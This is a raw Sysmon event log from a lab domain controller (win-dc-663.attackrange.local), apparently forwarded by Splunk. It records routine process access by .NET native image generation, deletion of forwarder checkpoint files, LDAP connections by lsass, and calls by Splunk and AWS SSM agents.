Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F47051C41CB9C921DC85A7ADCE162B2D,SHA256=AAD048CF4D2F2A91F0A1B865FAED22E5F98377BB786C27406DB95565DE42086F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019593Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:23.638{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A15F-60D3-F202-00000000CF01}6644C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019592Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:23.622{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A15F-60D3-F202-00000000CF01}6644C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019591Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:23.622{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A15F-60D3-F202-00000000CF01}6644C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000019590Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:23.482{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A15F-60D3-F102-00000000CF01}5300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019589Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:23.466{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A15F-60D3-F102-00000000CF01}5300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019588Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Directory ServiceMD5=0C229B89F63003D791C89B7A95F8D9FC,SHA256=622BDDE6AD239DA6991212E274B5A36F7863A77F517F80348A1BC4488B55FBE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019651Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:37.666{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C122AE571D4F55637B15932BE31B715,SHA256=BD0F8EE5C99FEE27F98E823C841E12B316D03276E1C99C9CC51C479541F2ABF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019652Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:38.682{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2002E286B75300780720A2EFA09E41C6,SHA256=C9191A32B776FCF43E77532627AD41CC7D9D4A5C5FCACCB0EAF913BE9DA9371B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019655Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:39.791{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C42D352109B6A13119BE18379149DA81,SHA256=4C766445C12E9BEFFF929BDB7B0ADCBFC89FC9FCDF8C87FCCE6A30791B907FD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019654Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:39.604{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=306CD73A7D23875FC8CB5C6FF24A3B53,SHA256=BAC917F5CC79E2FC68E87BEAB98E8985A85A4CEDE3BF69907EF1438FC0380270,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019653Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:39.073{4DB9351A-9DEA-60D3-3000-00000000CF01}2404NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=CC494228D9B622F65865431EE32BBCD9,SHA256=4850E6D9F469EFAD53275876C967519322E99DE1F613F517E377B814E20689E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019666Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:40.816{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=533B03711CC354DE2857CD984A8072C0,SHA256=74312C05EB7BFC60D8DE3F1A9541689058F7B072CAF4AC2959F1633DEF0B1970,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000019665Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:38.635{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local61390-true2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local389ldap 354300x800000000000000019664Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:38.635{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT 
AUTHORITY\SYSTEMtcptruetrue2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local61390-true2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local389ldap 354300x800000000000000019663Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:38.634{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local61389-true2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local389ldap 354300x800000000000000019662Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:38.634{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetrue2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local61389-true2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local389ldap 354300x800000000000000019661Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:38.633{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local61388-true2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local389ldap 354300x800000000000000019660Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:38.633{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetrue2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local61388-true2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local389ldap 354300x800000000000000019659Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:38.631{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local61387-true2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local389ldap 
354300x800000000000000019658Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:38.631{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetrue2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local61387-true2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local389ldap 354300x800000000000000019657Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:38.627{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61386-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local389ldap 354300x800000000000000019656Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:38.627{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61386-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local389ldap 23542300x800000000000000019668Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:41.895{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F41ED8AD32078BD6647C6B5016890C9,SHA256=91C4E843D7190DF890E98544C60DE457EF81C5B4CC43176261AA5C8EE0F3E971,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000019667Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:39.110{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61391-false10.0.1.12-8089- 23542300x800000000000000019673Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:42.910{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=849671DA75B19A7C53CF869EC64089A7,SHA256=AA9C06150F8D8EC7A37F4E5C0462AA45DA96030CC5AE0FA17661228E30CA6A81,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000019672Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:40.738{4DB9351A-9DEC-60D3-3500-00000000CF01}3296C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61394-false169.254.169.254-80http 354300x800000000000000019671Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:40.694{4DB9351A-9DEC-60D3-3500-00000000CF01}3296C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61393-false169.254.169.254-80http 354300x800000000000000019670Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:40.692{4DB9351A-9DEC-60D3-3500-00000000CF01}3296C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61392-false169.254.169.254-80http 11241100x800000000000000019669Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:42.707{4DB9351A-A16B-60D3-F902-00000000CF01}1688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\698-0\System.Windows.Forms.dll2021-06-23 21:02:42.707 23542300x800000000000000019684Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:43.926{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84937EA3491254820AD912395AF8019D,SHA256=86D403C1C31897B684361BD14F4CD983FFF6DF0E4CADE522E980B2DD79336625,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000019683Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:41.261{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61396-false10.0.1.12-8000- 354300x800000000000000019682Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:40.866{4DB9351A-9DEC-60D3-3500-00000000CF01}3296C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61395-false169.254.169.254-80http 10341000x800000000000000019681Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:43.816{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A173-60D3-FB02-00000000CF01}3492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019680Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:43.801{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A173-60D3-FB02-00000000CF01}3492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019679Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:43.801{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A173-60D3-FB02-00000000CF01}3492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000019678Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:43.254{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A173-60D3-FA02-00000000CF01}836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019677Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:43.238{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A173-60D3-FA02-00000000CF01}836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019676Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:02:43.238{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A173-60D3-FA02-00000000CF01}836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000019675Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:43.005{4DB9351A-A16B-60D3-F902-00000000CF01}1688NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BE3PZ7Z5BN\System.Windows.Forms.ni.dll.auxMD5=21E2E61DF5B7999BB79B1FFBF8C31550,SHA256=02AD47EF0468AA364FCB0146EC901BC3484BE76B6114E115E9E3032D5E449814,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000019674Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:42.988{4DB9351A-A16B-60D3-F902-00000000CF01}1688NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BE3PZ7Z5BN\System.Windows.Forms.ni.dllMD5=0AF28C9C7B3718528290583CB29A69D3,SHA256=3D9E7B2CB00D806EA1746CF57D3D6FCED987B1F5496A267D5973681803C68585,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000019704Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.988{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A174-60D3-FF02-00000000CF01}4564C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019703Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:44.973{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73FBD1C7ABB49C646B90B7087D964E84,SHA256=5A00B2DA611033E8F37808C89420D6EB03913C46FC5DBEB42EE6B09867FCFFBB,IMPHASH=00000000000000000000000000000000falsetrue 
